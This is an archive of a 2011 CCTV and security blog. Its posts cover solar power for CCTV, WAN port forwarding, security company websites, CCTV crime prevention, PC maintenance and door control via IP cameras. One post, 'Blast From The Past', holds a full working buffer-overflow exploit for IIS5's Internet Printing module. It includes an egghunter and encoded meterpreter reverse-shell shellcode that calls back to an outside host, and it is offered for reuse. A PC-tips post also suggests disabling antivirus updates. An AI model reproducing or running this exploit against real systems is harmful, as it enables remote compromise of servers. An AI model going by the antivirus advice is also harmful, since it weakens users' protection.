Saturday, June 25, 2011

Components of a stand alone solar PV system for CCTV System


Sunlight to Electricity is photovoltaic technology converts sunlight into electricity and is emerging as a major power source for CCTV due to its numerous environmental and economic benefits and proven reliability. Enough free sunlight falls on earth to supply our energy needs for years to come.
Environmental Benefits: As PV generates electricity from light, PV produces no air pollution or hazardous waste. It doesn't require liquid or gaseous fuel to be transported or combusted.


Economic and Social Benefits: Sunlight is free and abundant. A photovoltaic system allows you to generate electricity and store it for use when needed. Photovoltaic contributes to our energy security, as a young technology, it creates jobs and strengthens the economy. It frees us from uncertainties and foreign oil dependence.

This energy source is free, clean and highly reliable. PV systems are long-lasting and require little maintenance. The benefits of Photovoltaic’s far outweigh the initial cost the systems.

Solar Panels (PV) Modules
The DC electricity produced by the solar panel or module(s) is used to charge batteries via a solar charge controller. Any DC appliances that are connected to the battery will need to be fused.  DC lights are normally connected to the charge controller. Any AC appliances are powered via an inverter connected directly to the batteries. NOTE: inverters used in grid tie and stand alone systems are different and should not be interchanged.
Most stand alone PV systems need to be managed properly. Users need to know the limitations of a system and tailor energy consumption according to how sunny it is and the state of charge (SOC) of the battery.
Configuration
The solar panels need to be configured to match the system DC voltage, which is determined by the battery. System voltages are typically, 12V DC and 24V DC, larger systems will operate at 48V DC.
The operating voltage of a solar panel in a stand-alone system must be high enough to charge the batteries. For example, a 12V battery will require 14.4V to charge it. The solar panel must be able to deliver this voltage to the battery after power losses and voltage drop in the cables and charge controller and in conditions in which the solar cells operate at a high temperature. A solar panel with a Voc of about 20V is required to reliably charge a 12V battery.
Charge Controllers (Solar controller (or solar regulator))
A charge controller is designed to protect the battery and ensure it has a long working life without impairing the system efficiency. Batteries should not be overcharged and the function of the charge controller is to ensure that the battery is not over charged.
  • Charge controllers are designed to function as follows:
  • Protect the battery from over-discharge, normally referred to as low voltage disconnect (LVD) that disconnects the battery from the load when the battery reaches a certain depth of discharge (DOD).
  • Protect the battery from over-charging by limiting the charging voltage - this is important with sealed batteries - it is usually referred to as high voltage disconnect (HVD).
  • Prevent current flowing back into the solar panel during the night, so called reverse current.

NOTE: controllers with MPP tracking will ensure that the solar modules operate at optimal rating and can increase output by 10% or more.
Batteries
The power requirements of stand alone pv systems are rarely in sync with the battery charging. Appliances and loads need to be powered when there is sufficient solar radiation, during overcast weather and during the night. Bad weather may last for several days and the daily charging and discharging of the batteries takes its toll on them. Batteries that are able to handle the constant charging and discharging are known as deep cycle batteries. Batteries need to have a good charging efficiency, low charging currents and low self-discharge.
Battery Ah Efficiency
The Ah efficiency of a battery describes the relationship between Ah that are put into the battery and the Ah that are taken out. Under ideal conditions a new deep-cycle battery would be 90% efficient.
Choosing the most appropriate battery
The important characteristics to look for are:
  • capacity
  • cycle life
  • price / performance
  • size and space requirements
  • Ah efficiency
  • self-discharge rate
  • installation - vertical or horizontal
  • environmental - will batteries be placed near water supplies or in wildlife parks etc

Friday, June 10, 2011

Blast From The Past

Hi visitor I am from Kolkata, India. Its very simple and short Tutorial on my personal exp.
Recently on a test I ran into a windows 2000 server running iis5 with the Internet Printing module enabled, I was quite surprised by this but...a shell is a shell right? Since this was on the job and I wasn't wearing my cowboy hat I fired up my windows 2000 VM (who doesn't have one of those?) and went to work. Metasploit has a module for this vuln (exploit/windows/iis/ms01_023_printer) but surprisingly it is pretty flakey. On the first run of the exploit module it did not work so I took a look at my configuration of IIS again to make sure that everything was setup properly. After confirming IIS settings I tried the module a couple more times and finally was able to get a shell. I restarted IIS and tried the module a few more times...it was still hit or miss - sometimes it would work on the first try sometimes it would take three tries, something was strange....

After breaking out immunity debugger it became clear as to why the exploit did not work everytime. According to the metasploit module the shellcode was being held at an offset of EBX and with a short assembly stub we jump to that location (see metasploit snippet below)

buf = make_nops(280)
buf[268, 4] = [target.ret].pack('V')

# payload is at: [ebx + 96] + 256 + 64
buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]
buf << "\x80\xc1\x40" # add cl, 64
buf << "\x80\xc5\x01" # add ch, 1
buf << "\xff\xe1" # jmp ecx

sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

While this does work, it appears that sometimes the payload is not within the window and the exploit is not successful. Since we know about where in memory our payload will be when we gain control of EIP seems like a good place to use an egghunter :) I started out with an existing egghunter(http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf) and modified it a little since I know about where in memory my payload is there was no sense looking everywhere for it :) A warning ahead of time - I was lazy and nop'd out the access violation check...I had plenty of bytes to burn ;) -

mov edx, ebx #ebx is the area of our starting point
or dx, 0fff
xor dx,0fff #clear out the bottom half of edx for the start of our loop
inc edx #increment edx - this is the start of our loop
nop #abbreviated nops where the original access violation check was
...
...
mov eax, 57303054 #load our egg "W00T"
mov edi, edx #set edi to point at our current location in memory
scas dword ptr es:[edi] #compare our egg to dword at edi
jnz #jump back to the start of our loop (inc edx) if we didnt find the egg
scas dword ptr es:[edi] #compare our egg to the next dword for the 2nd part of the egg
jnz #jump back to the start of our loop (inc edx) if we didnt find the 2nd egg
jmp edi #jump to edi as it points to the first byte after our egg
After implementing the egghunter into the exploit I had no issues getting a shell everytime :)

Full exploit below - obviously will have to change the shellcode for it to work for you -

import urllib2
import sys

shell= "T00WT00W"
shell +="\x90"*(10)

########################################################################################################
# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.170.1 R|msfencode -e x86/alpha_upper -t c #
########################################################################################################
shell += ("\x89\xe1\xd9\xe8\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4b\x39\x43\x30\x45"
"\x50\x45\x50\x45\x30\x4d\x59\x4a\x45\x50\x31\x4e\x32\x45\x34"
"\x4c\x4b\x46\x32\x50\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b\x51"
"\x42\x44\x54\x4c\x4b\x43\x42\x46\x48\x44\x4f\x4f\x47\x50\x4a"
"\x46\x46\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x47\x4c\x43"
"\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x49\x51\x48\x4f\x44\x4d"
"\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32\x51\x47\x4c\x4b\x50"
"\x52\x42\x30\x4c\x4b\x47\x32\x47\x4c\x45\x51\x48\x50\x4c\x4b"
"\x47\x30\x42\x58\x4b\x35\x4f\x30\x42\x54\x51\x5a\x43\x31\x4e"
"\x30\x50\x50\x4c\x4b\x47\x38\x42\x38\x4c\x4b\x46\x38\x51\x30"
"\x45\x51\x49\x43\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x47\x44\x4c"
"\x4b\x43\x31\x4e\x36\x50\x31\x4b\x4f\x46\x51\x49\x50\x4e\x4c"
"\x49\x51\x48\x4f\x44\x4d\x45\x51\x48\x47\x47\x48\x4d\x30\x42"
"\x55\x4b\x44\x44\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46\x44"
"\x44\x35\x4a\x42\x50\x58\x4c\x4b\x50\x58\x46\x44\x45\x51\x49"
"\x43\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c"
"\x43\x31\x49\x43\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x48\x50\x4d"
"\x59\x51\x54\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x46\x39"
"\x51\x4a\x46\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c"
"\x4b\x42\x32\x4a\x4b\x4b\x36\x51\x4d\x42\x48\x46\x53\x46\x52"
"\x43\x30\x43\x30\x43\x58\x42\x57\x42\x53\x47\x42\x51\x4f\x50"
"\x54\x43\x58\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x49\x45"
"\x48\x38\x4a\x30\x45\x51\x45\x50\x45\x50\x46\x49\x49\x54\x50"
"\x54\x50\x50\x45\x38\x46\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f"
"\x48\x55\x46\x30\x50\x50\x46\x30\x46\x30\x47\x30\x46\x30\x51"
"\x50\x46\x30\x42\x48\x4b\x5a\x44\x4f\x49\x4f\x4d\x30\x4b\x4f"
"\x49\x45\x4a\x37\x42\x4a\x43\x35\x45\x38\x4f\x30\x49\x38\x4f"
"\x5a\x43\x31\x45\x38\x44\x42\x43\x30\x42\x31\x51\x4c\x4c\x49"
"\x4a\x46\x43\x5a\x42\x30\x50\x56\x51\x47\x43\x58\x4a\x39\x49"
"\x35\x43\x44\x43\x51\x4b\x4f\x48\x55\x4d\x55\x4f\x30\x43\x44"
"\x44\x4c\x4b\x4f\x50\x4e\x43\x38\x44\x35\x4a\x4c\x45\x38\x4a"
"\x50\x48\x35\x4f\x52\x50\x56\x4b\x4f\x48\x55\x43\x5a\x43\x30"
"\x43\x5a\x44\x44\x46\x36\x51\x47\x42\x48\x45\x52\x4e\x39\x4f"
"\x38\x51\x4f\x4b\x4f\x48\x55\x4c\x4b\x47\x46\x43\x5a\x51\x50"
"\x42\x48\x45\x50\x42\x30\x43\x30\x43\x30\x50\x56\x42\x4a\x45"
"\x50\x45\x38\x50\x58\x4e\x44\x46\x33\x4b\x55\x4b\x4f\x49\x45"
"\x4a\x33\x46\x33\x43\x5a\x43\x30\x50\x56\x51\x43\x50\x57\x42"
"\x48\x44\x42\x48\x59\x4f\x38\x51\x4f\x4b\x4f\x4e\x35\x45\x51"
"\x49\x53\x51\x39\x49\x56\x4d\x55\x4c\x36\x43\x45\x4a\x4c\x4f"
"\x33\x44\x4a\x41\x41")


egghunter="\x8B\xD3\x66\x81\xCA\xFF\x0F\x66\x81\xF2\xFF\x0F\x42\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x54\x30\x30\x57\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"


buff = 'A'*268 + '\x4d\x3f\xe3\x77' +"\x90"*5 + egghunter + '\x90'*156
useragent = 'Shit Bird'
header = {'User-Agent':useragent, 'Host':buff}

req = urllib2.Request('http://'+sys.argv[1]+'/NULL.printer?'+shell,headers = header)
res = urllib2.urlopen(req)
res.close()

Saturday, June 4, 2011

How do I setup IP forwarding/filtering with the Connect WAN

Introduction
The WAN supports four features which provide security and IP traffic forwarding when using incoming or Mobile Terminated connections:
1.      Network Address Translation (NAT)
2.      Generic Routing Encapsulation (GRE) forwarding
3.      TCP/UDP port forwarding
4.      IP Filtering
This document describes each function, how they are used in conjunction with each other, how they are used, and what issues can occur with each if not used properly.

Network Address Translation (NAT)
NAT allows the Connect WAN to have a single public IP address on the mobile link, while allowing multiple private IP addressed devices connected to the Ethernet interface. 
Outgoing traffic (mobile initiated) from the private network to the public mobile network assumes the IP address of the public mobile interface.  An internal table tracks which internal IP address made the outgoing request so that responses get sent to the proper requestor.
For example, a workstation at IP address 192.168.1.15 sends a request to www.arindamcctvaccesscontrol.blogspot.com.  The source IP address is changed by the Connect WAN address translation to the public 
Incoming (mobile terminated) traffic is either designated to the Connect WAN itself (i.e. HTTP or telnet connections for configuration or monitoring), or is forwarded to hosts via the Ethernet interface based either on GRE or TCP/UDP port forwarding which is covered below.
NAT provides two main benefits:
1.      Security: NAT hides the Private IP addresses of the devices on the Connect WAN''''s Ethernet network.
2.      IP Address Availability: IP addresses are in short supply and cost money.  The Connect WAN need be provided only one IP address from the wireless carrier.
NAT is enabled by default on the Connect WAN.  It should not be disabled unless there is a specific reason to do so.

Generic Routing Encapsulation (GRE) forwarding
GRE is a transport layer protocol, designated as IP protocol number 47, is used by many routers, WAN switches and VPN concentrators, to effectively tunnel traffic over a WAN between routers.  Note that GRE itself provides no encryption but protocols such as PPTP can use GRE.  IPSec can be encapsulated in GRE (and vice-versa).  GRE uses IP-in-IP and allows private IP addresses to be tunneled through a public network.

The Connect WAN provides a simple checkbox to turn on GRE forwarding to pass GRE traffic from the mobile interface through to a router on the Ethernet interface.  Note the Connect WAN only passes GRE traffic and does not terminate it.
Here is an example diagram:
Figure 1 - GRE Forwarding
The HQ router''s peer GRE address is the mobile IP address of the Connect WAN, which in this case is 166.213.229.218.  The Connect WAN has GRE forwarding enabled and will send to the router''s Ethernet WAN port, in this case 192.168.1.2.  Typically this connection is a directly connected Ethernet cable.
An example similar to the above is where GRE tunneling is used to create a backup WAN connection to a primary Frame Relay connection through the Connect WAN and wireless network. 

TCP/UDP Port Forwarding
Normally, traffic initiated from a host site to a Connect WAN is blocked by NAT, unless the traffic is destined for the Connect WAN itself.  Port forwarding provides a means to pass traffic from the mobile interface to devices connected to the Connect WAN''''s Ethernet port.  There are two main applications where port forwarding is required:
1.      Pass application data traffic, such as polls or requests, to Ethernet connected devices, and
2.      Pass VPN traffic, such as IPSec-in-UDP, through to routers or VPN appliances.
For example, three devices are attached to the Connect WAN''''s Ethernet port:
Figure 2 - TCP Port Forwarding
The application uses a protocol that polls the devices using the device IP address and TCP port 502 (which is Modbus).  On local LANs and publicly routable IP addresses this is not a problem. 
NAT hides the private Ethernet IP addresses of the devices connected behind the Connect WAN''''s Ethernet port.  The application can then only send polls to one IP address the mobile IP in this case 166.213.229.218. 
TCP port forwarding is used to forward the IP polls to one or more devices on the Connect WAN Ethernet port.  Different TCP port numbers are used to designate which device gets the proper traffic. The application must be able to support changing the TCP protocol port number from the default of 502.  In this case the application is configured to poll according to this table:
Remote Device
Destination IP Address
Destination TCP Port
One
163.213.229.218
12001
Two
163.213.229.218
12002
Three
163.213.229.218
12003
Notice the destination IP address is the Connect WAN''''s mobile IP address.
The Connect WAN is configured with a TCP/UDP forwarding table as follows:
Source TCP Port
Destination IP Address
Destination TCP Port
12001
192.168.1.2
502
12002
192.168.1.3
502
12003
192.168.1.4
502
Incoming traffic is then routed to the proper device.  The devices can use their standard TCP port of 502.
The main issue with port forwarding in this case is when the polling application does NOT allow the user to specify the TCP or UDP port used.  The workaround is to use routers that support GRE, VPN, or other forms of tunneling that can be forwarded through the Connect WAN.
Another example of port forwarding is forwarding of IPSec-in-UDP traffic to a VPN appliance or router attached to the Connect WAN''''s Ethernet port.  Figure 1 above shows a GRE tunnel.  In much the same way, IPSec traffic can be encapsulated in UDP to prevent NAT from modifying the IPSec headers (which would invalidate the traffic).  IPSec-in-UDP implementations always use UDP port 500 for IKE/ISAKMP, but can use various UDP port numbers for the AH/ESP traffic.  Here is an example of UDP port forwarding entries on a Connect WAN for IPSec in UDP:
Protocol
Source Port
Destination IP Address
Destination Port
UDP
500
192.168.1.2
500
UDP
4500
192.168.1.2
4500

IP Filtering
IP Filtering is a security feature that allows the user to block all incoming, mobile terminated traffic into the Connect WAN except for traffic from specific IP addresses and/or subnets.  There are three IP Filtering settings on the Connect WAN:
1.      Only allow access from the following devices and networks.  When checked this blocks ALL incoming traffic except for the traffic from the IP address/subnets listed in the "allow access" tables.
2.      Automatically allow access from all devices on the local subnet.  This allows out-bound traffic from the private Ethernet network out to the mobile network and beyond.
3.      Allow access from the following devices and/or subnets.  When the "Only allow access from the following devices and networks" box is checked, you must provide entries here to allow in-coming mobile traffic to be passed through the Connect WAN.
CAUTION: Incorrect settings here can stop some or all traffic.  For example, checking "Only allow access from the following devices and networks" without adding IP addresses or subnets to the "allow access" tables will block ALL incoming traffic, even responses from outgoing requests.

Monday, May 30, 2011

Three Common Mistakes made with Security Company Websites

Find out the three biggest mistakes you can make with your security company website.

I’ve visited a lot of Security and Investigation websites over the years, more so than most people ever will. I’ve also built 100’s of websites over the last decade, so I have an idea of what works and what doesn’t. Some sites are fantastic promotional tools for the company. Many in the security industry though leave a lot to be desired.

Below I’ll cover some of the biggest mistakes I’ve seen on Security Company Websites and give you an insight into why.

1. We are the leading security company
Really? Are you sure? Did you know that the potential client just visited 10 of your competitors and 8 of them said exactly the same thing. Who are they to believe? In a world where information is fast and quick at hand, where your competitors are only a few clicks away, sprouting to the world that you are the leading company does not inspire confidence. In fact it can have a negative effect when everyone else is saying exactly the same thing.

Find ways of inspiring confidence in your product or services that don’t require you to make claims without validation.

2. We offer Security Services Melbourne, Guards Melbourne, CCTV Melbourne, Alarms Melbourne
We get the point, you offer services in Melbourne. But who exactly do you think will be reading the words on your website? Potential clients? Existing clients? What are they going to think when you repeat words over and over to the point where it becomes painful to read? It’s not like you’d ever use a sentence like that when talking to them face to face, but that’s what your website is doing.

Now some of you reading this may be thing why on earth would anyone do that. Well some web designers, so called search engine optimisation experts and some people that just read the wrong things online think that if you repeat words over and over that you’ll get better search engine rankings. To an extent this is somewhat true. I mean the search engines are just programs and need to figure out what your page is about. So including on-topic keywords “within reason” helps the search engines get a better picture of what your company is all about.

The biggest problem with this though lies in the fact that the page will be read by humans, your potential clients. Even if you get the better rankings, what are those potential clients going to think when they read that? You may also find yourself penalized and lose your rankings in the search engines, but that’s another story. There are a lot of factors that go into search engine rankings, so focus on things that don’t require making a mockery of the English language. So to keep it simple, write for humans first, search engines second.

3. Last updated 2007
Do you still exist? You must since you paid your webhosting and domain name fees all this time, but do potential clients know that? A website built in the style of the last millennium also doesn’t inspire much trust or professionalism.

Now not everyone that set-up their website a long time ago believes the internet holds any value for their business. It probably didn’t work for them then and hence forth it probably won’t work now. The website though is a reflection of your business and speaks volumes about your attitude towards potential clients.

A quick update is in store and you don’t even have to break open the piggy bank to do so. With all the how-to websites around, with kids these days learning to build websites in school, I’m sure most companies could find a way to upload at least a one page site to replace that dinosaur. Keep it simple, present it neatly and include all relevant information. It should be a pretty quick thing.

How much is one new client that finds you on the net worth to your security business over a number of years anyway?

Sunday, May 1, 2011

Reduce Crime with Wireless/ non-Wireless CCTV Systems

CCTV Cameras are probably the best ways to reduce crime with your business or home, and there are numerous of places to purchase CCTV equipment. Below are a few factors to consider once shopping for CCTV cameras that will help you save time and expense, as well as help you to preferable to protect your home.

CCTV systems are used in public places all over the world for crime prevention. Or in the case of a crime being committed, the footage from the cameras can be used to apprehend and convict the perpetrators, perhaps even recover stolen property. And if they are wireless CCTV systems, it’s even more convenient.

CCTV systems for homes and work are, of course, not as elaborate as the ones used in huge malls or city streets. But they follow the same principle. The signal from the cameras is transmitted to only a limited number of screens or monitors. The footage is recorded so you can view it at your convenience. The system is quite easy to set up so you don’t have to pay a technician to come over and install it. Since they are wireless and there are no cables to get tangled up in, you can change the location of the cameras as and when you wish. Wireless CCTV cameras are fast becoming the ultimate tool in the fight against crime.

Rather than hire security personnel, most people are choosing CCTV systems to monitor their home or business. Security guards gain a lot of knowledge about your property and your comings and goings even if they’re on the job for just a week. This information can prove invaluable to planning a break-in. No matter how clean their background checks, who can you really trust nowadays?

The sight of a CCTV camera on your property will psychologically impair a burglar’s nerve to break and enter. Security experts aver that this is the main reason that CCTV systems are so effective in preventing crime. If the criminal plans to go ahead with the crime regardless, there’s a greater chance that the fear will make him bungle the job and get caught anyway. Statistics show that shops and convenient stores that have visible CCTV cameras have fewer instances of shop-lifting or “stick-ups”.

Where to Set Up Your Wireless CCTV System

Survey the property that you want to protect. You’ll want a camera at all entry and exit points including windows. You can also install infrared cameras outside your home for night-time surveillance. If the system is for your shop, consider all areas of the shop that are not directly visible from the cashier’s desk. Then, of course, there’s the cash counter. Consider any area that might be an advantage to a burglar, and put up a camera there. The receiver and monitors should be installed in an area where you spend most of your time.

Some CCTV systems come equipped with motion sensors. So it is only when the system detects an intruder that the cameras will come on, accompanied by a piercing alarm. Some security systems will even call the police or your cell phone to alert you. This is especially useful if you’re away a lot or if you don’t have the resources to man someone at the monitors all day.

The form of your camera will even play a huge part in how well hidden you is, and exactly how secure you can your office or home. Often times, if a surveillance camera is very obvious or large, criminals will immediately try and destroy the camera before stealing merchandise or money, or otherwise not damaging the home. If your CCTV camera is well hidden, it will be a hardship on burglars to obtain the camera, and it's also more likely that you're going to catch the trespassing on tape accurately. A discreet camera will likely make customers forms of languages in your house feel safer. So, small cameras, dome-shaped cameras, and in many cases submergible cameras make the perfect idea if you wish to add a little more security to your dwelling or business.

Don’t wait till you’re the victim of a crime before taking precautions. Install a wireless CCTV system today and sleep easy.

Saturday, April 30, 2011

Things that slow your PC down

You are install one CCTV Software in your Customer PC. During boot up a computer brand new from the store, and to revel in the galactic super-speed in which it loads. It’s another to keep it running at that same speed, especially after some months have passed.

There are many reasons why your computer isn’t running at its optimum. Fortunately, they’re all very easy to solve. Read on to find out what slows your PC down, and what you can do about it.
An overloaded startup
Most applications you install usually add themselves automatically to your Start Up folder. This results in a slower startup because of the time needed to load them all. If your computer used to boot at the speed of light, but now moves slower than an old lady at the zebra crossing, this might be your problem.

SOLVE THIS: by accessing the MSCONFIG command through your search bar or run application, heading to the Startup tab at the top, and unchecking all unnecessary programmes. Seriously, do you really need iTunes to boot whenever you start your computer?
Too many temporary files
Whenever you look at webpages, watch videos, look at photos or even type on Microsoft Word, your computer stores temporary files so that it can load up faster the next time round. These files build up over time and may slow your computer down, especially since they’re usually located in your OS drive.

SOLVE THIS: By running Windows Disk Cleanup, found in Accessories, regularly.
A fragmented disk
A very old school problem, but still a very real one. Disk fragmentation occurs when the file system can’t or won’t allocate enough continuous space to store a complete file. This results in gaps within that file, and can make that file run slower than it usually would. Sometimes, those gaps occur when the OS deletes a file it doesn’t need any more. (This is safe though, your OS is smarter than you think).

SOLVE THIS: By running the Disk Defragmenter, also found in Accessories, regularly. We suggest not using the computer whilst the
Defragmenter runs so as to minimise more fragmentation 
Programs uninstalled improperly
What a mouthful this header is. A PC does not work like a MAC – simply deleting the application you don’t want won’t cut it, and leaves behind remaining files that may cause your computer to slow down.

SOLVE THIS: By always uninstalling programs with the proper uninstall.exe, or remove them via the Control Panel. Go one step further to delete leftover files from the folder manually after uninstallation. This could include save games, 3rd party add ons, screenshots and etc.
A full OS disk
Many people make the mistake of saving everything possible into their C:/ drive, and that usually hosts their OS, or operating system. Once that drive gets too full, it slows down, thereby slowing down your entire computer’s processing speed.

SOLVE THIS: by partitioning your drive into C:/ and D:/ and saving your data in D:/. The lack of strain on your OS drive will let it run faster. You might be pleasantly amazed at the difference this can make.
Background anti-viruses
Anti-viruses are always helpful, but can sometimes do more harm than good. Since they’re always running and usually boot together with your computer, they can slow down processes considerably. Strangely enough, it’s always the ones you’ve got to pay for that wreak the most havoc.

SOLVE THIS: By disabling auto scans and updates, or by switching to a more lightweight, freeware anti-virus. Some have suggested Avira and AVG Antivirus, but it’s your job to ask your trusted geek friend what he’s using.
Spyware and viruses
Malicious software often heads straight for your Windows Registry or core file system, slowing down your computer. They can sneak in with applications you download online and install, and can also hop in from less-than-savoury websites you visit.
SOLVE THIS: While spyware and viruses can be removed manually by deleting them from your registry, some can be more persistent. In this case, use an automatic spyware remover – tons are available if you do a Google search. One of the more popular one is Ad-Aware Spyware Remover.


--Thanks to Maryanne Lee to provide info.

Door Monitoring and Control with Internet CCTV

Because internet CCTV cameras are intelligent, as opposed to the “dumb” traditional CCTV cameras, you can use them to see your property from wherever you are in the world, over the internet.  That, however, is just the start.  By joining these cameras to simple alarm and control circuits, they can be used to monitor and control doors.  In part one of this two-part series, I will show you how the monitoring side of the equation works.

Seeing your home, business or family from the other side of the world is amazing enough, but wireless internet CCTV cameras can do so much more than even this impressive feat.  Most of the best of this type of camera will have a digital input/output port, or I/O port, that allows the camera to be connected to electrical circuits.  The two input connectors on the port can be used to monitor an alarm circuit and trigger an alarm as I will explain.

The input connectors can be wired to each end of a so-called alarm circuit that in reality is nothing more than an unbroken loop of low-voltage wire, connected to, say, a pair of magnetic door contacts.  These are a standard part of any alarm system, but for those of you who have not come across them, you basically get two magnets, with plastic mounts.  One of them has connectors for the two wires of the alarm circuit.  You screw this one with the wires to the door frame, and the other one to the opening door so that they are lined up very close to each other when the door is closed, which keeps the circuit unbroken.  This is known as a “normally closed” or “NC” circuit, because in its normal state, the circuit is complete or closed.  When the door is opened, the magnetic contacts separate and the circuit is broken.

The wireless internet CCTV camera will detect when the circuit is broken because there will be a change in voltage at the input connectors and the camera is programmed to raise the alarm when this happens.  So, when the door is opened your camera can send an immediate message across the internet to a central computer.  This computer is programmed to send a text message to your mobile phone, and perhaps an email too – all within seconds of the door being opened.  Of course, if you want this great feature without “getting your hands dirty”, you will need a specialist “internet CCTV” company that can provide you with a camera pack ready-configured to work with your alarm circuit, so you can just plug it in.

We looked at how your wireless internet CCTV camera can monitor the area in front of an external door, and raise an alert when someone approaches the door.  In this final part of the series we are going to look at the next step in the process; how to use your camera to unlock the door.

You may remember from part one that most good quality internet CCTV cameras have a digital input/output port, or I/O port.  This is simply a series of connectors that allow the camera to be attached to electrical circuits.  I have shown you in part one how the two input connectors on the port can be used for monitoring an alarm circuit and raising an alert.  In a similar way, the two output connectors can be used to switch electrical equipment.  Your camera can be configured so that a current is sent to the output connectors under certain circumstances.  This gets very interesting, because unbelievably you can use the camera to actually open the door! So how can a wireless CCTV camera actually open a front door?  I will explain how in the next few sections.

The first piece of equipment you will need is an electronic door release, which you fit to the door frame.  This is a common piece of equipment in home and business security systems and can be obtained inexpensively by searching for “electronic door release” on the internet.  The door release is fitted to the door frame so that the catch on the door lock fits into it.  The door lock is untouched and the door can be unlocked with a key as usual, but the electronic door release can also open the door.  It does this by freeing the catch from the door frame without unlocking the lock, when a current is sent along the attached wires.

The next step is simply to run the wires from the door release mechanism to the output connectors on the internet CCTV camera’s I/O port. The camera has to be programmed so that it will accept an “open door” text message from your mobile phone or from a web page, and send a current to release the door.  Of course, you may be happy enough fitting the door release mechanism, but programming the camera to work with it is a specialist task.  I always recommend getting in touch with an “internet CCTV” provider for a ready-programmed camera that you simply plug in, so you get this great feature without needing any technical knowledge.

Once you have everything connected, here is how it all works in practice.  Let’s say you get a text message alert from the camera to tell you that someone is at the door, and you know it’s about the time your son gets home from school.  You log in using your mobile phone or PC and see a live picture of your son standing outside the front door, unable to get in because he’s forgotten his key.  You can simply send a text message from your phone to a central number, with your password, user name and a simple command such as “open front door”.  A central computer program gets your text message and processes it, checking your credentials.  Then, the system sends a message across the internet to your internet CCTV camera, and the camera then sends a current to the door release mechanism, which opens the door for your son, all within a few seconds!

New applications for wireless internet CCTV such as door monitoring and control bring the technology to a different level when compared to traditional CCTV.  This is yet another reason why these intelligent digital cameras are fast replacing dumb analogue cameras the world over.